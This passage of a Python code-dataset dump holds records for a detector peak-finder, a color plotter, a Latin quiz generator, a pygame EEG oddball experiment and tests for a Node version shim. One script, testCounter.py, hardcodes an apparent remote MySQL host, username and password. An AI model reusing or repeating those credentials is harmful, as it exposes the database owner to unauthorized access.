son_min=6) # for v2r1\n\n\n\n#alg_equ.print_attributes()\n#alg_equ.print_input_pars()\n\n##-----------------------------\n\nxoffset, yoffset = 300, 300\nxsize, ysize = 1150, 1150\n\n# Pixel image indexes\niX = np.array(det.indexes_x(evt), dtype=np.int64) #- xoffset\niY = np.array(det.indexes_y(evt), dtype=np.int64) #- yoffset\n\n# Protect indexes (should be POSITIVE after offset subtraction)\nimRow = np.select([iX=EVTMAX : break\n\n # get calibrated data ndarray and proccess it if it is available\n t1_sec = time()\n #nda = det.calib(evt)\n\n # Apply custom calibration: raw, -peds, -bkgd, *smask, -cmod\n nda_raw = det.raw(evt)\n\n if nda_raw is not None :\n\n nda = np.array(nda_raw, dtype=np.float32, copy=True)\n nda -= nda_peds\n nda = subtract_bkgd(nda, nda_bkgd, mask=nda_smask, winds=winds_bkgd, pbits=0)\n nda *= nda_smask\n det.common_mode_apply(evt, nda)\n\n #print ' ----> calibration dt = %f sec' % (time()-t1_sec)\n\n\n #print_arr_attr(nda, 'calibrated data')\n t0_sec = time()\n\n # run peakfinders and get list of peak records for each region\n #peaks_arc = alg_arc.peak_finder_v2r1(nda, thr=30, r0=7, dr=2)\n #peaks_arc = alg_arc.peak_finder_v3r1(nda, rank=5, r0=7, dr=2, nsigm=0) # 1.64 (5%)\n #peaks_arc = alg_arc.peak_finder_v4r1(nda, thr_low=10, thr_high=150, rank=5, r0=7, dr=2)\n peaks_arc = alg_arc.peak_finder_v4r2(nda, thr_low=10, thr_high=150, rank=5, r0=7, dr=2)\n\n #peaks_equ = alg_equ.peak_finder_v2r1(nda, thr=30, r0=7, dr=2)\n #peaks_equ = alg_equ.peak_finder_v3r1(nda, rank=5, r0=7, dr=2, nsigm=0) # 1.64 (5%)\n #peaks_equ = alg_equ.peak_finder_v4r1(nda, thr_low=10, thr_high=150, rank=5, r0=7, dr=2)\n peaks_equ = alg_equ.peak_finder_v4r2(nda, thr_low=10, thr_high=150, rank=5, r0=7, dr=2)\n \n # available after v2r1, v4r2\n #maps_of_conpix_arc = alg_arc.maps_of_connected_pixels()\n #maps_of_conpix_equ = alg_equ.maps_of_connected_pixels()\n\n # available after v3r1 ONLY!\n #maps_of_locmax_arc = alg_arc.maps_of_local_maximums()\n #maps_of_locmax_equ = alg_equ.maps_of_local_maximums()\n\n ###===================\n if do_print(i) : print('%s\\n%s\\n%s\\n%s' % (85*'_', pstore.header[0:66], pstore.rec_evtid(evt), addhdr))\n ###===================\n\n peak_reg_lists = list(zip(('ARC','EQU'), (peaks_arc, peaks_equ))) \n\n # loop over ARC and EQU regions\n for reg, peak_list in peak_reg_lists :\n\n # loop over peaks found in the region\n for peak in peak_list :\n\n # get peak parameters\n seg,row,col,npix,amax,atot,rcent,ccent,rsigma,csigma,\\\n rmin,rmax,cmin,cmax,bkgd,rms,son = peak[0:17]\n\n # get pixel coordinates\n imrow, imcol, xum, yum, rum, phi = geo_pars(seg, row, col)\n \n # make peak-record and save it in the file\n rec = fmt % (i, reg, seg, row, col, npix, amax, atot, rcent, ccent, rsigma, csigma,\\\n rmin, rmax, cmin, cmax, bkgd, rms, son,\\\n imrow, imcol, xum, yum, rum, phi)\n \n pstore.save_peak(evt, rec)\n\n ###===================\n if do_print(i) : print('%s' % rec)\n ###===================\n\n ###===================\n if do_print(i) : print('Event %d --- dt/evt = %f sec' % (i, time()-t0_sec))\n ###===================\n\n if DO_PLOT and i%EVTPLOT==0 :\n\n #nda = maps_of_conpix_arc \n #nda = maps_of_conpix_equ \n #nda = nda_bkgd\n #nda = nda_bkgd + regs_check \n #img = det.image(evt, nda)\n #img = det.image(evt, nda)[xoffset:xoffset+xsize,yoffset:yoffset+ysize]\n img = det.image(evt, mask_img*nda)[xoffset:xoffset+xsize,yoffset:yoffset+ysize]\n #img = det.image(evt, maps_of_conpix_equ)[xoffset:xoffset+xsize,yoffset:yoffset+ysize]\n ave, rms = img.mean(), img.std()\n amin, amax = ave-1*rms, ave+8*rms\n gg.plot_img(img, mode='do not hold', amin=amin, amax=amax)\n gg.plot_peaks_on_img(peaks_arc, axim, imRow, imCol, color='w') #, pbits=3)\n gg.plot_peaks_on_img(peaks_equ, axim, imRow, imCol, color='w') #, pbits=3)\n\n #gg.plotHistogram(nda, amp_range=(-100,100), bins=200, title='Event %d' % i)\n\n fig.canvas.set_window_title('Event: %d' % i) \n fig.canvas.draw() # re-draw figure content\n\n\nprint(' ----> Event loop time = %f sec' % (time()-t0_sec_evloop))\n\npstore.close_file()\n\n##-----------------------------\n\ngg.show() # hold image untill it is closed\n \n##-----------------------------\n\nsys.exit('Test is completed')\n\n##-----------------------------\n","sub_path":"examples/ex_peakfinder_cspad.py","file_name":"ex_peakfinder_cspad.py","file_ext":"py","file_size_in_byte":9656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"420493737","text":"import pymysql\n\n\nconnection=pymysql.connect(\"mysql6001.site4now.net\", \"a2dc82_recipes\", \"conaobiad1\", \"db_a2dc82_recipes\")\ncursor=connection.cursor()\n\nid = 1\ntry:\n przepis = \"SELECT * FROM DINNER \"\n cursor = connection.cursor()\n cursor.execute(przepis)\n result = cursor.fetchall()\n one=result[0][0]\n print(one)\n\n\nexcept:\n connection.rollback()","sub_path":"testCounter.py","file_name":"testCounter.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"285156947","text":"import tkinter\nimport colorsys\nimport math\n\n# Make the window large so that we can see more detail.\nCANVAS_WIDTH = 1000\nCANVAS_HEIGHT = 1000\nBIG_CIRCLE_RADIUS = 450\nDATA_FILE = 'small.txt'\nDOT_SIZE = 4\n\n\ndef main():\n # get a drawing canvas\n canvas = make_canvas(CANVAS_WIDTH, CANVAS_HEIGHT, 'XKCD Colors')\n\n dataset = load_data()\n while True:\n query = input('Color name: ')\n query = query.lower()\n if query == 'clear':\n canvas.delete(\"all\")\n elif query in dataset:\n colors = dataset[query]\n display_colors(canvas, colors)\n elif query == '':\n break\n canvas.update()\n\n\ndef display_colors(canvas, color_list):\n for color in color_list:\n r = color[0]\n g = color[1]\n b = color[2]\n plot_color(canvas, r, g, b)\n\n\ndef plot_color(canvas, r, g, b):\n hsv = colorsys.rgb_to_hsv(r / 256, g / 256, b / 256)\n\n radius = BIG_CIRCLE_RADIUS * hsv[1]\n\n theta = hsv[0] * math.pi * 2.0\n\n x = CANVAS_WIDTH / 2.0 + radius * math.cos(theta)\n y = CANVAS_HEIGHT / 2.0 - radius * math.sin(theta)\n\n color_str = colorstr_from_rgb(r, g, b)\n plot_pixel(canvas, x, y, color_str)\n\n\ndef plot_pixel(canvas, x, y, color_str):\n # Create a 1x1 rectangle\n canvas.create_oval(x, y, x+DOT_SIZE, y+DOT_SIZE,\n fill=color_str, outline=color_str)\n\n\ndef load_data():\n data = {}\n file = open(DATA_FILE)\n n_colors = 0\n for line in file:\n line = line.strip()\n add_color(data, line)\n n_colors += 1\n # print(len(data), n_colors)\n file.close()\n return data\n\n\ndef add_color(data, line):\n parts = line.split(',')\n color_name = parts[0]\n color_rgb = color_from_line(line)\n if color_name not in data:\n data[color_name] = []\n data[color_name].append(color_rgb)\n\n\ndef color_from_line(line):\n parts = line.split(',')\n r = int(parts[1])\n g = int(parts[2])\n b = int(parts[3])\n return [r, g, b]\n\n\ndef colorstr_from_rgb(red, green, blue):\n assert 0 <= red <= 256\n assert 0 <= green <= 256\n assert 0 <= blue <= 256\n return \"#%02x%02x%02x\" % (red, green, blue)\n\n######## DO NOT MODIFY ANY CODE BELOW THIS LINE ###########\n\n# This function is provided to you and should not be modified.\n# It creates a window that contains a drawing canvas that you\n# will use to make your drawings.\n\n\ndef make_canvas(width, height, title=None):\n \"\"\"\n DO NOT MODIFY\n Creates and returns a drawing canvas\n ready for drawing.\n \"\"\"\n top = tkinter.Tk()\n top.minsize(width=width, height=height)\n if title:\n top.title(title)\n canvas = tkinter.Canvas(top, width=width + 1, height=height + 1)\n canvas.pack()\n return canvas\n\n\nif __name__ == '__main__':\n main()","sub_path":"xkcd.py","file_name":"xkcd.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"268060159","text":"from random import randint\r\n\"\"\"\r\nThis class is responsible for sorting through a list of problems and making a dictionary of the questions and answers.\r\n\"\"\"\r\nclass QuestionMaker:\r\n\r\n def sort(self, path, delineater):\r\n \"\"\"\r\n The DataSorter class takes a file path, which tells it where to open the file containing a list of\r\n problems/questions as well as a delineater to tell it where the line between questions and answers should be drawn.\r\n \"\"\"\r\n questionDict = {}\r\n file = open(path, \"r\")\r\n for line in file:\r\n tempList = line.split(delineater, 1)\r\n if (\"\\n\" in tempList[1]):\r\n tempList[1] = tempList[1].replace(\"\\n\", '', 1)\r\n questionDict[tempList[0]] = tempList[1]\r\n return questionDict\r\n\r\n def createQuestions(self, questionDict):\r\n \"\"\"\r\n This method takes a dictionary of questions and answers and turns it into a multiple choice quiz\r\n \"\"\"\r\n questList = [\"\"] * 5\r\n for x in range(0, 5):\r\n quizNumb = randint(0, len(questionDict))\r\n vocabWord = str(list(questionDict.items())[quizNumb][0])\r\n formattedVocabWord = self.formatString(vocabWord)\r\n question = str(x + 1) + \". What does the Latin word \" \\\r\n + formattedVocabWord + \" mean?\" + '\\n'\r\n answerNum = randint(0, 3)\r\n for y in range(0, 4):\r\n if y is answerNum:\r\n answer = str(y + 1) + \". \" \\\r\n + self.formatString(str(questionDict.get(vocabWord))) + '\\n'\r\n else:\r\n randomAnswer = list(questionDict.values())[randint(0, len(questionDict))]\r\n answer = str(y + 1) + \". \" + self.formatString(str(randomAnswer)) + '\\n'\r\n\r\n question += answer\r\n\r\n questList[x] = question\r\n return questList\r\n\r\n def formatString(self, string):\r\n formatedString = string.replace('\\n', \"\")\r\n length = len(formatedString) - 1\r\n while formatedString[0] == \" \":\r\n formatedString = formatedString[1:length]\r\n length -= 1\r\n length = len(formatedString) - 1\r\n while formatedString[length] == \" \":\r\n formatedString = formatedString[0:length]\r\n length =- 1\r\n return formatedString\r\n\r\npath = \"LatinWords.txt\"\r\nquiz = QuestionMaker()\r\nquizQuestions = quiz.sort(path, \":\")\r\nlatinQuestions = quiz.createQuestions(quizQuestions)\r\nfor string in latinQuestions:\r\n print(string)","sub_path":"QuestionMaker.py","file_name":"QuestionMaker.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"533048548","text":"import time\nimport os\nimport sys\nimport random\nimport datetime\nimport numpy\nimport pygame\nfrom pylsl import StreamInfo, StreamOutlet, local_clock\n\n###FIRST DEFINE OUR PARTICIPANT NUMBER###\n##part_num = '003'\n##except_list = ['001']\n##except_list.append(part_num)\n\ntext_file = open(\"/home/pi/Experiments/Familiarity_Oddball/Parts\",\"r\")\nexcept_list = text_file.read().split(',')\npart_num = except_list[0]\n##with open('/home/pi/Experiments/Familiarity_Oddball/Participant_Number','r') as myfile:\n##\tpart_num = myfile.read().replace('\\n','')\n##part_num= str(numpy.genfromtxt('/home/pi/Experiments/Familiarity_Oddball/Participant_Number', dtype='str'))\n##except_list = str(numpy.genfromtxt('/home/pi/Experiments/Familiarity_Oddball/Exclude', dtype='str'))\n##part_num = except_list[1:6]\n#part_num= str(numpy.genfromtxt('/home/pi/Experiments/Familiarity_Oddball/Participant_Number', dtype='str'))\n\n###setup variable related to pic and trial number here###\nlow_rate = 0.8\nhigh_rate = 0.2\n\ntotal_parts = 6\nself_count = 5\nfam_count = 5\nplace_count = 10\ntrials = (self_count + fam_count + place_count)*total_parts\n\n###create our stream variables###\ninfo = StreamInfo('Markers', 'Markers', 1, 0, 'int32', 'myuidw43536')\n\n###next make an outlet to record the streamed data###\noutlet = StreamOutlet(info)\n\n###setup GPIO pins and initialise pygame###\npygame.mixer.pre_init(44100,-16,2,512)\npygame.init()\npygame.display.init()\npygame.mixer.init()\n\n###setup the display screen and fixation###\npygame.mouse.set_visible(0)\ndisp_info = pygame.display.Info()\nscreen = pygame.display.set_mode((disp_info.current_w, disp_info.current_h),pygame.FULLSCREEN)\nx_center = disp_info.current_w/2\ny_center = disp_info.current_h/2\nblack = pygame.Color(0, 0, 0)\nwhite = pygame.Color(255,255,255)\n\n###so, we need 2 master lists\n###one that tells us if the current trial will be a standard or target\n###another that will tell use if we need to show a self, family, or place image\n\n###first we determine how many of each image we need\nself_images = (numpy.zeros((2,total_parts*self_count)))+1\nfam_images = (numpy.zeros((2,total_parts*fam_count)))+2\nplace_images = (numpy.zeros((2,total_parts*place_count)))+3\n\n###now loop through and define our targets and standards###\n\nfor i_img in range(total_parts*self_count):\n if i_img < ((total_parts*self_count)*low_rate):\n self_images[1][i_img] = 1\n elif i_img >= ((total_parts*self_count)*low_rate):\n self_images[1][i_img] = 2\n\nfor i_img in range(total_parts*fam_count):\n if i_img < ((total_parts*fam_count)*low_rate):\n fam_images[1][i_img] = 1\n elif i_img >= ((total_parts*fam_count)*low_rate):\n fam_images[1][i_img] = 2\n\nfor i_img in range(total_parts*10):\n if i_img < ((total_parts*10)*low_rate):\n place_images[1][i_img] = 1\n elif i_img >= ((total_parts*10)*low_rate):\n place_images[1][i_img] = 2\n\n###here we will combine our three matrices### \nimage_order = numpy.concatenate((self_images,fam_images,place_images),axis = 1)\n\n###convert them to a list, pair each of the elements, and then shuffle the order###\nimage_order = list(zip(image_order[0],image_order[1]))\nrandom.shuffle(image_order)\nimage_order, trial_order = zip(*image_order)\n\n###define when we will have breaks###\nbreak1 = int(trials*0.25)\nbreak2 = int(trials*0.5)\nbreak3 = int(trials*0.75)\nbreak4 = int(trials*0.75)\nbreak5 = int(trials*0.75)\n\n###setup variables to record times###\ntrig_time = []\ndelay_length = []\npart_list = []\nimage_list = []\nimage_type = []\n#trig_time = [\"\" for x in range(trials)]\n#delay_length = [\"\" for x in range(trials)]\n#part_list = [\"\" for x in range(trials)]\n#image_list = [\"\" for x in range(trials)]\n#image_type = [\"\" for x in range(trials)]\n\n###setup our instruction screens###\npygame.font.init()\nmyfont = pygame.font.SysFont('Times New Roman', 20)\ninstructions_1 = myfont.render('Focus on the central fixation during the task.', True, white)\ninstructions_2 = myfont.render('Press the spacebar when you see your pictures, do not press the spacebar when you see other pictures.', True, white)\ninstructions_3 = myfont.render('Press the spacebar when you are ready to begin.', True, white)\nbreak_screen_1 = myfont.render('Feel free to take a break at this time.', True, white)\nbreak_screen_2 = myfont.render('Press the spacebar when you are ready to continue.', True, white)\ndone_1 = myfont.render('Great! You have finished the experiment!', True, white)\ndone_2 = myfont.render('Please let the experimenter know you have finished.', True, white)\ndone_3 = myfont.render('Press the spacebar to exit.', True, white)\n\n###show our instructions, and wait for a response###\nscreen.blit(instructions_1,(x_center-((instructions_1.get_rect().width)/2),y_center + ((instructions_1.get_rect().height)*1)+10))\nscreen.blit(instructions_2,(x_center-((instructions_2.get_rect().width)/2),y_center + ((instructions_2.get_rect().height)*2)+10))\nscreen.blit(instructions_3,(x_center-((instructions_3.get_rect().width)/2),y_center + ((instructions_3.get_rect().height)*3)+10))\npygame.display.flip()\ntime.sleep(1)\nkey_pressed = 0\npygame.event.clear()\nwhile key_pressed == 0:\n event = pygame.event.wait()\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n key_pressed = 1\n\nscreen.fill(pygame.Color(\"black\")) \npygame.draw.line(screen, (255, 255, 255), (x_center-10, y_center), (x_center+10, y_center),4)\npygame.draw.line(screen, (255, 255, 255), (x_center, y_center-10), (x_center, y_center+10),4)\npygame.display.flip()\ntime.sleep(1)\n\n###wait for button press to start experiment###\nvid_start = time.time()\ntimestamp = local_clock()\ntime.sleep(1)\noutlet.push_sample([3], timestamp)\n\nfor i_pic in range(trials):\n if i_pic in (break1, break2, break3, break4 ,break5):\n ###show the break screen, and wait for a response###\n screen.fill(pygame.Color(\"black\")) \n screen.blit(break_screen_1,(x_center-((break_screen_1.get_rect().width)/2),y_center + ((break_screen_1.get_rect().height)*1)+10))\n screen.blit(break_screen_2,(x_center-((break_screen_2.get_rect().width)/2),y_center + ((break_screen_2.get_rect().height)*2)+10))\n pygame.display.flip()\n time.sleep(1)\n key_pressed = 0\n pygame.event.clear()\n while key_pressed == 0:\n event = pygame.event.wait()\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n key_pressed = 1\n screen.fill(pygame.Color(\"black\")) \n pygame.draw.line(screen, (255, 255, 255), (x_center-10, y_center), (x_center+10, y_center),4)\n pygame.draw.line(screen, (255, 255, 255), (x_center, y_center-10), (x_center, y_center+10),4)\n pygame.display.flip()\n time.sleep(1)\n else:\n ###wait for a random amount of time between images###\n delay = ((random.randint(0,500))*0.001)+1.00\n delay_length.append(delay)\n ###determine if the trial is a standrad or target###\n ###trial is a target###\n if trial_order[i_pic] == 2:\n ###change current part number to a string of the appropriate format###\n if int(part_num) > 9:\n part_order_temp = '0' + str(int(part_num))\n else:\n part_order_temp = '00' + str(int(part_num))\n\n ###now define our trigger to send with LSL###\n trigger = 2\n ###trial is a standard###\n elif trial_order[i_pic] == 1:\n ###pick a random number between 1 and our total number of participants###\n part_order_temp = random.randint(1,total_parts)\n \n ###change part num to an appropriate format###\n if part_order_temp > 9:\n part_order_temp = '0' + str(int(part_order_temp))\n else:\n part_order_temp = '00' + str(int(part_order_temp))\n ###since standards are images from other parts, make sure we are not using the current part number###\n while part_order_temp in except_list:\n part_order_temp = random.randint(1,total_parts)\n ###change part num to an appropriate format###\n if part_order_temp > 9:\n part_order_temp = '0' + str(int(part_order_temp))\n else:\n part_order_temp = '00' + str(int(part_order_temp))\n\n ###now define our trigger to send with LSL###\n trigger = 1\n ###now determine the type of image, and image number, we are showing###\n if image_order[i_pic] == 1:\n pic_order_temp = random.randint(1,self_count)\n elif image_order[i_pic] == 2:\n pic_order_temp = random.randint(1,fam_count)\n elif image_order[i_pic] == 3:\n pic_order_temp = random.randint(1,place_count)\n\n ###change part num to an appropriate format###\n if pic_order_temp > 9:\n pic_order_temp = str(int(pic_order_temp))\n else:\n pic_order_temp = '0' + str(int(pic_order_temp))\n\n ###now check to see what image type we will show###\n if image_order[i_pic] == 1:\n if os.path.exists('/home/pi/Experiments/Familiarity_Oddball/Images/' + part_order_temp + '_SFSS_' + pic_order_temp + '.jpg'):\n image_order_temp = 'SFSS'\n else:\n image_order_temp = 'SFBB'\n elif image_order[i_pic] == 2:\n if os.path.exists('/home/pi/Experiments/Familiarity_Oddball/Images/' + part_order_temp + '_FFSS_' + pic_order_temp + '.jpg'):\n image_order_temp = 'FFSS'\n else:\n image_order_temp = 'FFBB'\n elif image_order[i_pic] == 3:\n image_order_temp = 'P'\n\n ###record our part and image numbers###\n part_list.append(part_order_temp)\n image_list.append(pic_order_temp)\n image_type.append(image_order_temp)\n trial_img = pygame.image.load('/home/pi/Experiments/Familiarity_Oddball/Images/' + part_order_temp + '_' + image_order_temp + '_' + pic_order_temp + '.jpg')\n print('/home/pi/Experiments/Familiarity_Oddball/Images/' + part_order_temp + '_' + image_order_temp + '_' + pic_order_temp + '.jpg')\n ###send triggers###\n timestamp = local_clock()\n outlet.push_sample([trigger], timestamp)\n trig_time.append(time.time() - vid_start) \n ###present image###\n screen.fill(pygame.Color(\"black\")) \n screen.blit(trial_img,((x_center-(trial_img.get_width()/2)),(y_center-(trial_img.get_height()/2))))\n pygame.display.flip()\n time.sleep(1.5)\n screen.fill(pygame.Color(\"black\")) \n pygame.draw.line(screen, (255, 255, 255), (x_center-10, y_center), (x_center+10, y_center),4)\n pygame.draw.line(screen, (255, 255, 255), (x_center, y_center-10), (x_center, y_center+10),4)\n pygame.display.flip()\n ###wait for a random amount of time and set the trigger back to zero###\n time.sleep(delay)\n\ntime.sleep(5)\nos.remove(\"/home/pi/Experiments/Familiarity_Oddball/Stop_EEG.csv\")\nfilename = \"%s_all_familiarity_p3_trigs_muse\"%(part_num)\nfilename_part = (\"/home/pi/Experiments/Familiarity_Oddball/Data/LSL/Muse/Muse_Recorded_Trig_Info/%s.csv\")%filename\nnumpy.savetxt(filename_part, (part_list,image_list,image_type,image_order,trial_order,trig_time,delay_length), delimiter=',',fmt=\"%s\") \n\nscreen.fill(pygame.Color(\"black\")) \nscreen.blit(done_1,(x_center-((done_1.get_rect().width)/2),y_center + ((done_1.get_rect().height)*1)+10))\nscreen.blit(done_2,(x_center-((done_2.get_rect().width)/2),y_center + ((done_2.get_rect().height)*2)+10))\nscreen.blit(done_3,(x_center-((done_3.get_rect().width)/2),y_center + ((done_3.get_rect().height)*3)+10))\npygame.display.flip()\nkey_pressed = 0\npygame.event.clear()\nwhile key_pressed == 0:\n event = pygame.event.wait()\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n key_pressed = 1\n \ntime.sleep(5)\n\npygame.mouse.set_visible(0)\npygame.display.quit()\npygame.quit() \nsys.exit()\n","sub_path":"Familiarity_Oddball/LSL/old/familiarity_p3_muse_lsl_copy3.py","file_name":"familiarity_p3_muse_lsl_copy3.py","file_ext":"py","file_size_in_byte":12329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"626661798","text":"\"\"\"\n\n json.dumps:\n 存储\n 将 Python 对象编码成 JSON 字符串(str对象)\n\n\"\"\"\n\nimport json\n\ndata = [{\"name\": \"yhz\", \"lang\": (\"python\", \"english\"), \"age\": 40}] # \ndata_j = json.dumps(data, sort_keys=True, indent=2) # \n\nprint(data_j)\n\n# sort_keys=True 意思是按照键的字典顺序排序\n# indent=2 是让每个键值对显示的时候,以缩进两个字符对齐,效果好看\n","sub_path":"A_库的分类/Json_yhz/1、dumps.py","file_name":"1、dumps.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"491110669","text":"\"\"\"Test main shim logic\"\"\"\nimport os\nimport subprocess\nimport sys\nfrom pathlib import Path\n\nimport pytest\nimport semver\n\nfrom nvshim.core.__main__ import (\n HashableDict,\n HashableList,\n get_files,\n get_nvm_aliases,\n get_nvm_stable_version,\n get_nvmrc,\n main,\n match_version,\n parse_args,\n parse_version,\n resolve_alias,\n run_nvm_cmd,\n)\nfrom nvshim.utils.environment import (\n EnvironmentVariable,\n process_env,\n)\nfrom nvshim.utils.process import clean_output\n\n\ndef test_raises_missing_bin_file():\n \"\"\"Test parsing of no arguments provided\"\"\"\n with pytest.raises(SystemExit):\n parse_args([])\n\n\ndef test_accepts_bin_file_arg(snapshot):\n \"\"\"Test parsing accept the bin file to be called\"\"\"\n snapshot.assert_match(parse_args([\"node\"]))\n\n\ndef test_accepts_any_arg_for_bin_file(snapshot):\n \"\"\"Test parsing accepts the bin file and arguments to be called with\"\"\"\n snapshot.assert_match(parse_args([\"npm\", \"--version\", \"--help\"]))\n\n\ndef test_fails_when_nvm_dir_not_available(capsys, snapshot, test_args):\n \"\"\"Test main logic that when nvm dir is not available appropriate error is raised\"\"\"\n with process_env({EnvironmentVariable.VERBOSE.value: \"true\"}), pytest.raises(\n SystemExit\n ) as exc_info:\n main()\n\n captured = capsys.readouterr()\n snapshot.assert_match(clean_output(captured.out))\n assert not captured.err\n assert exc_info.value.code == 1003\n\n\ndef test_fails_when_version_not_installed(\n mocker,\n capsys,\n snapshot,\n test_args,\n test_nested_workspace_with_nvmrc,\n test_node_version_dir,\n):\n \"\"\"Test main logic that when nvm dir is not available appropriate error is raised\"\"\"\n nvm_dir, _ = test_node_version_dir\n mocker.patch(\n \"nvshim.core.__main__.os.getcwd\",\n autospec=True,\n return_value=test_nested_workspace_with_nvmrc,\n )\n mock_env = {\n EnvironmentVariable.NVM_DIR.value: nvm_dir,\n **os.environ,\n EnvironmentVariable.VERBOSE.value: \"true\",\n EnvironmentVariable.AUTO_INSTALL.value: \"false\",\n }\n with process_env(mock_env), pytest.raises(SystemExit) as exc_info:\n main()\n\n captured = capsys.readouterr()\n snapshot.assert_match(clean_output(captured.out))\n assert not captured.err\n assert exc_info.value.code == 1001\n\n\ndef test_fails_when_node_binary_not_found_in_install_path(\n mocker,\n capsys,\n test_args,\n test_workspace_with_nvmrc,\n test_node_version_dir,\n):\n \"\"\"Test main logic checks nvm install node binary exists before execution\"\"\"\n nvm_dir, node_version_dir = test_node_version_dir\n mocker.patch(\n \"nvshim.core.__main__.os.getcwd\",\n autospec=True,\n return_value=test_workspace_with_nvmrc,\n )\n expected_node_bin_path = f\"{node_version_dir}/bin/{test_args[1]}\"\n\n mocker.patch(\n \"nvshim.core.__main__.os.path.exists\",\n side_effect=lambda path: Path(path).exists()\n if path != expected_node_bin_path\n else False,\n )\n mock_env = {\n EnvironmentVariable.NVM_DIR.value: nvm_dir,\n **os.environ,\n EnvironmentVariable.VERBOSE.value: \"true\",\n EnvironmentVariable.AUTO_INSTALL.value: \"true\",\n }\n with process_env(mock_env), pytest.raises(SystemExit) as exc_info:\n main()\n\n captured = capsys.readouterr()\n assert \"No executable file found at\" in clean_output(captured.out)\n assert exc_info.value.code == 1002\n\n\ndef test_runs_correct_version_of_node(\n mocker,\n capsys,\n test_args,\n test_nested_workspace_with_nvmrc,\n test_node_version_dir,\n):\n \"\"\"Test main logic that correct version of node is used from .nvmrc file\"\"\"\n nvm_dir, node_version_dir = test_node_version_dir\n mocker.patch(\n \"nvshim.core.__main__.os.getcwd\",\n autospec=True,\n return_value=test_nested_workspace_with_nvmrc,\n )\n mocked_process_run = mocker.patch(\n \"nvshim.utils.process.subprocess.run\", wraps=subprocess.run\n )\n mock_env = {\n EnvironmentVariable.NVM_DIR.value: nvm_dir,\n **os.environ,\n EnvironmentVariable.VERBOSE.value: \"true\",\n EnvironmentVariable.AUTO_INSTALL.value: \"true\",\n }\n with process_env(mock_env):\n main()\n\n mocked_process_run.assert_called_with(\n (f\"{node_version_dir}/bin/{test_args[1]}\", *test_args[2:]),\n check=True,\n encoding=\"UTF-8\",\n )\n captured = capsys.readouterr()\n assert \"with version \" in clean_output(captured.out)\n assert not captured.err\n\n\ndef test_get_files_returns_path_when_single_file(test_workspace_with_nvmrc):\n \"\"\"Test get files when called for non directory\"\"\"\n file_path = f\"{test_workspace_with_nvmrc}/.nvmrc\"\n result = [*get_files(file_path)]\n assert result == [file_path]\n\n\ndef test_run_nvm_command_handles_failure_to_remove_tmp_file(capsys, mocker, snapshot):\n \"\"\"Test handling of os remove file error\"\"\"\n mocked_process_run = mocker.patch(\n \"nvshim.core.__main__.process.run\",\n autospec=True,\n )\n mocker.patch(\n \"nvshim.core.__main__.os.remove\",\n autospec=True,\n side_effect=OSError,\n )\n run_nvm_cmd(\"/home/.nvm/.nvm.sh\", \"list\")\n mocked_process_run.assert_called_with(\n \"bash\", f\"{os.path.dirname(sys.argv[0])}/nvm_shim.sh.tmp\"\n )\n captured = capsys.readouterr()\n assert snapshot == clean_output(captured.out)\n\n\ndef test_get_nvm_stable_version_returns_nothing_when_no_version_found(\n capsys, mocker, snapshot\n):\n \"\"\"Test failure handling of fetching stable version from nvm\"\"\"\n mocked_process_run = mocker.patch(\n \"nvshim.core.__main__.process.run\",\n autospec=True,\n return_value=subprocess.CompletedProcess(None, 1),\n )\n assert get_nvm_stable_version(\"/home/.nvm\") is None\n mocked_process_run.assert_called_with(\n \"bash\",\n f\"{os.path.dirname(sys.argv[0])}/nvm_shim.sh.tmp\",\n stdout=subprocess.PIPE,\n )\n captured = capsys.readouterr()\n assert snapshot == clean_output(captured.out)\n\n\ndef test_get_nvm_stable_version_returns_correctly_when_no_version_found(mocker):\n \"\"\"Test correct handling of fetching alias version from nvm\"\"\"\n test_nvm_dir = \"/home/.nvm\"\n expected_version = \"17.8.0\"\n mocked_run_nvm_cmd = mocker.patch(\n \"nvshim.core.__main__.run_nvm_cmd\",\n autospec=True,\n return_value=subprocess.CompletedProcess(\n None, 0, f\"stable -> 17.8 (-> v{expected_version}) (default)\\n\"\n ),\n )\n assert get_nvm_aliases(test_nvm_dir) == {\n \"default\": \"stable\",\n \"stable\": expected_version,\n }\n mocked_run_nvm_cmd.assert_called_with(\n f\"{test_nvm_dir}/nvm.sh\", \"alias --no-colors\", stdout=subprocess.PIPE\n )\n\n\ndef test_parse_version_handles_none_case():\n \"\"\"Test parse version handles when version given is None\"\"\"\n assert parse_version(None) is None\n\n\ndef test_get_nvmrc_uses_raw_value_when_not_parseable(test_workspace):\n \"\"\"Test get nvmrc uses value in rc version when not parseable\"\"\"\n nvmrc_path = f\"{test_workspace}/.nvmrc\"\n non_parseable_version = \"D902\"\n with open(nvmrc_path, \"w\", encoding=\"UTF-8\") as open_file:\n open_file.write(non_parseable_version)\n assert get_nvmrc(nvmrc_path) == non_parseable_version\n\n\ndef test_resolve_alias_handles_cycles():\n \"\"\"Test that resolving aliases can handle recursive references\"\"\"\n mock_alias_mappings = HashableDict({\"a\": \"b\", \"b\": \"c\", \"c\": \"a\"})\n result = resolve_alias(\"a\", mock_alias_mappings)\n assert result == (None, \"a\", HashableList([\"a\", \"b\", \"c\"]))\n\n\ndef test_parse_version_returns_correct_values():\n \"\"\"Test limits of version parsing\"\"\"\n assert parse_version(\"\") is None\n assert parse_version(\"1\") is None\n assert parse_version(\"v1\") is None\n assert parse_version(\"v1.0\") is None\n assert parse_version(\"v1.0\") is None\n assert parse_version(\"1.0.0\") == semver.VersionInfo(1, 0, 0)\n assert 